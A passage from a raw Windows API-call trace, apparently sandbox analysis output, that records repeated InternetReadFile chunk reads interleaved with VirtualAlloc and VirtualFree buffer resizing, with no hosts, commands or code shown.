(lpAddress=0x35d0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0099.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.073] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.073] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.075] VirtualFree (lpAddress=0x35b0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.076] VirtualAlloc (lpAddress=0x35f8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f8000 [0099.077] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.079] VirtualFree (lpAddress=0x35d0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.080] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.080] VirtualFree (lpAddress=0x35f0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.081] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.083] VirtualFree (lpAddress=0x35f8000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.084] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.084] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.085] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.087] VirtualFree (lpAddress=0x35b0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.089] VirtualAlloc (lpAddress=0x35f8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f8000 [0099.089] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.092] VirtualFree (lpAddress=0x35d0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.093] VirtualFree (lpAddress=0x35f0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.093] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.096] VirtualFree (lpAddress=0x35f8000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.097] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.097] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.109] VirtualFree (lpAddress=0x35b0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.110] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.110] VirtualAlloc (lpAddress=0x35f8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f8000 [0099.111] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.113] VirtualFree (lpAddress=0x35d0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.114] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.115] VirtualFree (lpAddress=0x35f0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.115] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.118] VirtualFree (lpAddress=0x35f8000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.119] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.119] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.119] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.128] VirtualFree (lpAddress=0x35b0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.129] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.129] VirtualAlloc (lpAddress=0x35f8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f8000 [0099.131] VirtualFree (lpAddress=0x35d0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.132] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.132] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.134] VirtualFree (lpAddress=0x35f4000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.135] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.135] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.135] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.137] VirtualFree (lpAddress=0x35b0000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.138] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.138] VirtualAlloc (lpAddress=0x35f8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f8000 [0099.140] VirtualFree (lpAddress=0x35d0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.141] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.141] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.143] VirtualFree (lpAddress=0x35f4000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.144] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.144] VirtualAlloc (lpAddress=0x35d4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d4000 [0099.145] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.145] VirtualFree (lpAddress=0x3618000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.145] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.147] VirtualFree (lpAddress=0x35b0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.148] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.148] VirtualAlloc (lpAddress=0x3600000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3600000 [0099.149] VirtualFree (lpAddress=0x35fc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.150] VirtualFree (lpAddress=0x35d4000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.151] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.151] VirtualFree (lpAddress=0x35f8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.151] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.153] VirtualFree (lpAddress=0x3600000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.154] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.155] VirtualFree (lpAddress=0x3624000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.156] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.164] VirtualFree (lpAddress=0x35b0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.165] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.165] VirtualAlloc (lpAddress=0x3600000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3600000 [0099.166] VirtualFree (lpAddress=0x35fc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.168] VirtualFree (lpAddress=0x35d4000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.170] VirtualFree (lpAddress=0x35f8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.170] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.173] VirtualFree (lpAddress=0x3600000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.174] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.174] VirtualFree (lpAddress=0x3624000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.174] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.177] VirtualFree (lpAddress=0x35b0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.178] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.178] VirtualAlloc (lpAddress=0x3600000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3600000 [0099.179] VirtualFree (lpAddress=0x35fc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.181] VirtualFree (lpAddress=0x35d4000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.182] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.183] VirtualFree (lpAddress=0x35f8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.183] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.185] VirtualFree (lpAddress=0x3600000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.186] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.186] VirtualFree (lpAddress=0x3624000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.187] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.188] VirtualFree (lpAddress=0x35b0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.189] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.189] VirtualAlloc (lpAddress=0x3600000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3600000 [0099.191] VirtualFree (lpAddress=0x35d4000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.192] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.192] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.194] VirtualFree (lpAddress=0x35fc000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.195] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.195] VirtualFree (lpAddress=0x3624000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.196] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.197] VirtualFree (lpAddress=0x35b0000, dwSize=0x24000, dwFreeType=0x4000) returned 1 [0099.198] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.198] VirtualAlloc (lpAddress=0x3600000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3600000 [0099.200] VirtualFree (lpAddress=0x35d4000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.201] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.201] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.203] VirtualFree (lpAddress=0x35fc000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.204] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.204] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0099.205] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.205] VirtualFree (lpAddress=0x3624000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.205] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.207] VirtualFree (lpAddress=0x35b0000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.208] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.208] VirtualAlloc (lpAddress=0x3608000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3608000 [0099.208] VirtualFree (lpAddress=0x3604000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.210] VirtualFree (lpAddress=0x35d8000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.211] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.211] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.212] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.213] VirtualFree (lpAddress=0x3608000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.214] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.214] VirtualFree (lpAddress=0x3630000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.215] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.217] VirtualFree (lpAddress=0x35b0000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.217] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.218] VirtualAlloc (lpAddress=0x3608000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3608000 [0099.218] VirtualFree (lpAddress=0x3604000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.220] VirtualFree (lpAddress=0x35d8000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.221] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.222] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.224] VirtualFree (lpAddress=0x3608000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.225] VirtualFree (lpAddress=0x3630000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.225] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.227] VirtualFree (lpAddress=0x35b0000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.228] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.228] VirtualAlloc (lpAddress=0x3608000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3608000 [0099.228] VirtualFree (lpAddress=0x3604000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.230] VirtualFree (lpAddress=0x35d8000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.232] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.232] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.233] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.235] VirtualFree (lpAddress=0x3608000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.236] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.237] VirtualFree (lpAddress=0x3630000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.237] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.240] VirtualFree (lpAddress=0x35b0000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.241] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.241] VirtualAlloc (lpAddress=0x3608000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3608000 [0099.244] VirtualFree (lpAddress=0x35d8000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.245] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.246] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.248] VirtualFree (lpAddress=0x3604000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.250] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.250] VirtualFree (lpAddress=0x3630000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.250] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.257] VirtualFree (lpAddress=0x35b0000, dwSize=0x28000, dwFreeType=0x4000) returned 1 [0099.258] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.258] VirtualAlloc (lpAddress=0x3608000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3608000 [0099.260] VirtualFree (lpAddress=0x35d8000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.261] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.261] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x2c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.263] VirtualFree (lpAddress=0x3604000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.264] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.264] VirtualAlloc (lpAddress=0x35dc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35dc000 [0099.265] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.265] VirtualFree (lpAddress=0x3630000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.265] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0099.268] VirtualFree (lpAddress=0x35b0000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.269] VirtualAlloc (lpAddress=0x3610000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x3610000 [0099.269] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.272] VirtualFree (lpAddress=0x35dc000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.273] VirtualFree (lpAddress=0x3608000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.273] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.275] VirtualFree (lpAddress=0x3610000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0099.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, 